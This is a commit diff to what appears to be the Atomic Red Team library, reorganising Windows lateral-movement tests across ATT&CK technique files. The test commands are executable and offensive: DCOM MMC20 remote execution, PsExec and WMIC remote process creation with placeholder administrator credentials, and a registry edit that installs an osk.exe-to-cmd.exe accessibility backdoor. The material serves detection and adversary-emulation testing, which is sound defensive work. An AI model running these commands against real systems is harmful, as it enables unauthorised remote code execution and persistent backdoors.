T1028 "Windows Remote Management": split in several techniques

Fixes redcanaryco#1042

atomics/T1021.003/T1021.003.yaml

@@ -0,0 +1,24 @@
+attack_technique: T1021.003
+display_name: 'Remote Services: Distributed Component Object Model'
+atomic_tests:
+- name: PowerShell Lateral Movement using MMC20
+  auto_generated_guid: 6dc74eb1-c9d6-4c53-b3b5-6f50ae339673
+  description: |
+    Powershell lateral movement using the mmc20 application com object.
+
+    Reference:
+
+    https://blog.cobaltstrike.com/2017/01/24/scripting-matt-nelsons-mmc20-application-lateral-movement-technique/
+
+    Upon successful execution, cmd will spawn calc.exe on a remote computer.
+  supported_platforms:
+  - windows
+  input_arguments:
+    computer_name:
+      description: Name of Computer
+      type: string
+      default: localhost
+  executor:
+    command: |
+      [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Document.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7")
+    name: powershell

atomics/T1021.006/T1021.006.yaml

@@ -14,91 +14,6 @@ atomic_tests:
       Enable-PSRemoting -Force
     name: powershell
     elevation_required: true
-- name: PowerShell Lateral Movement
-  auto_generated_guid: 6dc74eb1-c9d6-4c53-b3b5-6f50ae339673
-  description: |
-    Powershell lateral movement using the mmc20 application com object.
-
-    Reference:
-
-    https://blog.cobaltstrike.com/2017/01/24/scripting-matt-nelsons-mmc20-application-lateral-movement-technique/
-
-    Upon successful execution, cmd will spawn calc.exe on a remote computer.
-  supported_platforms:
-  - windows
-  input_arguments:
-    computer_name:
-      description: Name of Computer
-      type: string
-      default: localhost
-  executor:
-    command: |
-      [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Document.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7")
-    name: powershell
-- name: WMIC Process Call Create
-  auto_generated_guid: 5cd59c3b-1375-4edf-9bac-5851c9915fca
-  description: |
-    Utilize WMIC to start remote process.
-
-    Upon successful execution, cmd will utilize wmic.exe to modify the registry on a remote endpoint to swap osk.exe with cmd.exe.
-  supported_platforms:
-  - windows
-  input_arguments:
-    user_name:
-      description: Username
-      type: String
-      default: DOMAIN\Administrator
-    password:
-      description: Password
-      type: String
-      default: P@ssw0rd1
-    computer_name:
-      description: Target Computer Name
-      type: String
-      default: Target
-  executor:
-    command: |
-      wmic /user:#{user_name} /password:#{password} /node:#{computer_name} process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"
-    name: command_prompt
-- name: Psexec
-  auto_generated_guid: 9bab84a1-08fd-4245-b681-e62c78283002
-  description: |
-    Utilize psexec to start remote process.
-
-    Upon successful execution, cmd will utilize psexec.exe to spawn cmd.exe on a remote system.
-  supported_platforms:
-  - windows
-  input_arguments:
-    user_name:
-      description: Username
-      type: String
-      default: DOMAIN\Administrator
-    psexec_exe:
-      description: Path to PsExec
-      type: string
-      default: C:\PSTools\PsExec.exe
-    password:
-      description: Password
-      type: String
-      default: P@ssw0rd1
-    computer_name:
-      description: Target Computer Name
-      type: String
-      default: localhost
-  dependencies:
-  - description: |
-      PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_exe})
-    prereq_command: |
-      if (Test-Path "#{psexec_exe}") { exit 0} else { exit 1}
-    get_prereq_command: |
-      Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip"
-      Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force
-      New-Item -ItemType Directory ("#{psexec_exe}") -Force | Out-Null
-      Copy-Item $env:TEMP\PsTools\PsExec.exe "#{psexec_exe}" -Force
-  executor:
-    command: |
-      #{psexec_exe} \\#{computer_name} -accepteula -u #{user_name} -p #{password} -s cmd.exe
-    name: command_prompt
 - name: Invoke-Command
   auto_generated_guid: 5295bd61-bd7e-4744-9d52-85962a4cf2d6
   description: |

atomics/T1047/T1047.yaml

@@ -88,14 +88,22 @@ atomic_tests:
       description: Ip Address
       type: String
       default: 127.0.0.1
+    user_name:
+      description: Username
+      type: String
+      default: DOMAIN\Administrator
+    password:
+      description: Password
+      type: String
+      default: P@ssw0rd1
     process_to_execute:
       description: Name or path of process to execute.
       type: String
       default: notepad.exe
   executor:
     command: |
-      wmic /node:"#{node}" process call create #{process_to_execute}
+      wmic /user:#{user_name} /password:#{password} /node:"#{node}" process call create #{process_to_execute}
     cleanup_command: |
-      wmic /node:"#{node}" process where name='#{process_to_execute}' delete >nul 2>&1
+      wmic /user:#{user_name} /password:#{password} /node:"#{node}" process where name='#{process_to_execute}' delete >nul 2>&1
     name: command_prompt
 

atomics/T1218.003/T1218.003.yaml

@@ -49,4 +49,24 @@ atomic_tests:
     command: |
       cmstp.exe /s #{inf_file_uac} /au
     name: command_prompt
+- name: PowerShell Lateral Movement
+  auto_generated_guid: 6dc74eb1-c9d6-4c53-b3b5-6f50ae339673
+  description: |
+    Powershell lateral movement using the mmc20 application com object.
+
+    Reference:
 
+    https://blog.cobaltstrike.com/2017/01/24/scripting-matt-nelsons-mmc20-application-lateral-movement-technique/
+
+    Upon successful execution, cmd will spawn calc.exe on a remote computer.
+  supported_platforms:
+  - windows
+  input_arguments:
+    computer_name:
+      description: Name of Computer
+      type: string
+      default: localhost
+  executor:
+    command: |
+      [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Document.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7")
+    name: powershell

atomics/T1569.002/T1569.002.yaml

@@ -31,16 +31,24 @@ atomic_tests:
   auto_generated_guid: 873106b7-cfed-454b-8680-fa9f6400431c
   description: |
     Requires having Sysinternals installed, path to sysinternals is one of the input input_arguments
-    Will run a command on a remote host.
+    Will start a process on a remote host.
 
-    Upon successful execution, powershell will download psexec.exe and spawn calc.exe on a remote endpoint (default:localhost).
+    Upon successful execution, cmd will utilize psexec.exe to spawn calc.exe on a remote endpoint (default:localhost).
   supported_platforms:
   - windows
   input_arguments:
     remote_host:
       description: Remote hostname or IP address
       type: string
       default: localhost
+    user_name:
+      description: Username
+      type: String
+      default: DOMAIN\Administrator
+    password:
+      description: Password
+      type: String
+      default: P@ssw0rd1
     psexec_exe:
       description: Path to PsExec
       type: string
@@ -57,5 +65,5 @@ atomic_tests:
       Copy-Item $env:TEMP\PsTools\PsExec.exe "#{psexec_exe}" -Force
   executor:
     command: |
-      #{psexec_exe} \\#{remote_host} -accepteula "C:\Windows\System32\calc.exe"
-    name: powershell
+      #{psexec_exe} \\#{remote_host} -u #{user_name} -p #{password} -accepteula "C:\Windows\System32\calc.exe"
+    name: command_prompt